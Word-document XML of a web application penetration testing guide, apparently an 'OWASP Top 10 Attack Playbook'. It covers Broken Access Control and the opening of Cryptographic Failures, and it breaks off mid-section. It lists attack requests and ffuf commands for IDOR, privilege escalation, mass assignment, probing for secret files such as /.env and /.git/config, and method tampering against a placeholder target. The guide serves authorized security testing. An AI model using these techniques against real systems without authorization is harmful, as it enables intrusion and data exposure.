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200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji"/>
          <w:sz w:val="120"/>
          <w:szCs w:val="120"/>
        </w:rPr>
        <w:t xml:space="preserve">🔐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="154360"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete OWASP Top 10 Attack Playbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Written by a 30-Year Security Architecture Veteran</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Professional Pentest Lab Reference Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIAL — AUTHORIZED USE ONLY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Penetration Testing Methodology Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A structured web application pentest follows a defined lifecycle. Each phase builds on the previous one. Rushing or skipping phases leads to missed vulnerabilities and incomplete reports.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4360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>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360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="154360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>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What You Do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Passive &amp; active information gathering — subdomains, tech stack, exposed endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Scanning &amp; Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Port scanning, directory brute-force, fingerprinting, parameter discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Test each OWASP Top 10 vector. Confirm and PoC every finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Pivot, escalate, persist, exfiltrate (within scope)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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CVSS scoring, PoC, business impact, remediation steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="154360"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-Engagement Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Core tools — install before you start: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Burp Suite Pro      → Intercept, scan, intruder, repeater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OWASP ZAP          → Passive/active scanning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ffuf / gobuster     → Directory &amp; parameter fuzzing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sqlmap             → Automated SQL injection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nuclei             → Template-based vulnerability scanning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nikto              → Web server misconfiguration scanner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jwt_tool           → JWT attack suite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commix             → Command injection automation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dalfox             → XSS parameter analysis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tplmap             → SSTI (Template injection) scanner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ghauri             → Advanced SQLi tool (sqlmap alternative)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interactsh         → Out-of-band interaction server (Burp Collab alternative)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Pro Tip — Always Proxy First</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Set Burp Suite as your proxy before touching the target. Turn on passive scanning. Browse every feature manually — Burp logs everything. This alone surfaces 30% of findings before you run a single active test.</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A01 — Broken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22B21" w:sz="6"/>
              <w:left w:val="single" w:color="922B21" w:sz="6"/>
              <w:bottom w:val="single" w:color="922B21" w:sz="6"/>
              <w:right w:val="single" w:color="922B21" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="922B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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="922B21" w:sz="4"/>
              <w:left w:val="single" w:color="922B21" w:sz="4"/>
              <w:bottom w:val="single" w:color="922B21" w:sz="4"/>
              <w:right w:val="single" w:color="922B21" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FADBD8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ranked #1 in OWASP Top 10 2021. Found in 94% of tested applications. Allows attackers to access data or perform actions beyond their intended permissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control occurs when users can act outside of their intended permissions. This is the most common and impactful vulnerability class in modern web applications. It encompasses IDOR, privilege escalation, forced browsing, and more.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1.1 What Is It?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Access control enforces policy such that users cannot act outside their intended permissions. When these controls fail, attackers can view other users' data, modify or delete records, and access admin functionality. Unlike authentication (proving who you are), access control governs what you are allowed to do.</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1.2 Attack Vector 1 — IDOR (Insecure Direct Object Reference)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR occurs when an application uses user-controllable input to access objects directly without verifying the user has permission to access that specific object.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276" w:sz="6"/>
              <w:left w:val="single" w:color="1A5276" w:sz="24"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="6"/>
              <w:right w:val="single" w:color="1A5276" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="D6EAF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Real-World Example</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A banking app returns account details at /api/account/10045. Changing the ID to 10046 returns another customer's account. No error. No access check. Full data exposure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Detect IDOR in URL parameters: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GET /api/user/1001/profile       → Change 1001 to 1002, 1003...</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GET /invoice/download?id=500     → Fuzz id with ffuf or Burp Intruder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GET /order/view/ORD-2024-001     → Enumerate sequential IDs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Automate IDOR fuzzing with ffuf:</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ffuf -u "https://target.com/api/user/FUZZ/data"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 /usr/share/seclists/Fuzzing/Integers.txt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-fc 403,404 -mc all -o idor_results.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Test in POST bodies, headers, and cookies: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POST /api/transfer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{"from_account": "YOURS", "to_account": "VICTIM", "amount": 0}</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Cookie: userId=1001   → Change to userId=1002</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X-User-ID: 1001       → Change to X-User-ID: 9999 (admin?)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — GUID/UUID IDOR — not secure by obscurity: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GUIDs can be leaked in logs, emails, responses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GET /api/document/550e8400-e29b-41d4-a716-446655440000</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Search all responses and JS files for UUIDs belonging to other users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1.3 Attack Vector 2 — Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Horizontal privilege escalation means accessing another user's data. Vertical privilege escalation means accessing functionality of a higher-privileged role (e.g., user → admin).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Vertical Escalation — accessing admin endpoints as regular user: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GET /admin/users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GET /api/admin/settings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POST /api/user/role   {"role": "admin"}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DELETE /api/users/all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Response manipulation in Burp — intercept and modify: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Original response: {"role": "user", "admin": false}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Modified response: {"role": "admin", "admin": true}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Also try modifying requests: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POST /login   → add header:  X-Original-URI: /admin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 add header:  X-Forwarded-For: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Mass Assignment — sending fields the API doesn't expect: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POST /api/update-profile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{"name": "John", "email": "john@x.com", "role": "admin", "isAdmin": true}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1.4 Attack Vector 3 — Forced Browsing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forced browsing is accessing files, directories, and endpoints that are not linked from the application UI but exist on the server. Backup files, admin panels, and API documentation are common targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory brute-force with ffuf:</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ffuf -u https://target.com/FUZZ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 /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt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-e .php,.asp,.aspx,.jsp,.bak,.old,.conf,.sql,.log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-mc 200,301,302,403 -t 50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">High-value targets to always check:</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/.git/config           /web.config         /phpinfo.php</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/.env                  /.env.production     /.env.backup</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/backup.zip            /database.sql        /db_backup.tar.gz</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/admin                 /administrator       /wp-admin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/api/v1/               /api/docs            /swagger-ui.html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/actuator              /actuator/env        /actuator/heapdump  (Spring)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/console               /h2-console          /phpmyadmin</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1.5 Attack Vector 4 — HTTP Method Tampering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications may restrict access via GET but forget to apply the same access check to PUT, DELETE, PATCH, or other methods. Some WAFs and firewalls also only inspect GET/POST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Try alternate methods on restricted endpoints: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Original: GET /admin/delete-user?id=5   → 403 Forbidden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Try:      DELETE /admin/delete-user?id=5</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POST /admin/delete-user?id=5</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PUT /admin/delete-user?id=5</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PATCH /admin/delete-user?id=5</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HEAD /admin/delete-user?id=5  → reveals if resource exists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1.6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Implement server-side access control checks on every endpoint. Never rely on hidden UI elements. Use UUIDs for object IDs but validate ownership server-side. Deny by default — if a user's authorization is not explicitly verified, deny access. Log all access control failures and alert on repeated failures.</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A02 — Cryptographic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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D35400" w:sz="4"/>
              <w:left w:val="single" w:color="D35400" w:sz="4"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="4"/>
              <w:right w:val="single" w:color="D35400" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Previously called "Sensitive Data Exposure." Covers weak encryption, data transmitted in cleartext, insecure key management, and broken cryptographic implementations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptographic failures happen when sensitive data is not adequately protected in transit or at rest. This includes using outdated algorithms like MD5 or SHA1 for passwords, no HTTPS enforcement, hardcoded keys, or poor JWT implementation.</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2.1 Transport Layer Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if HTTPS is enforced and headers are present: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curl -v http://target.com                              # Is HTTP redirected to HTTPS?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curl -I https://target.com | grep -i "strict-transport"  # HSTS present?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curl -I https://target.com | grep -i "x-content-type"    # MIME sniffing protection?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curl -I https://target.com | grep -i "x-frame-options"   # Clickjacking protection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL/TLS weakness — use testssl.sh or sslyze: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testssl.sh https://target.com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sslyze --regular target.com:443</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Look for: SSLv2, SSLv3, TLS 1.0/1.1, RC4, weak ciphers, expired certs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2.2 Sensitive Data in Transit &amp; Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
